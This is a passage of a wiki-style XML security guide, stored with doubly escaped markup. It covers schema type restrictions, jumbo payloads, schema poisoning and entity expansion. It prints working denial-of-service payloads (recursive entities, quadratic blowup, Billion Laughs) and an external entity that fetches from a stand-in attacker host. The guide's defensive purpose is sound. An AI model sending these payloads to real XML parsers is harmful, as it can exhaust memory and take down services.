Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
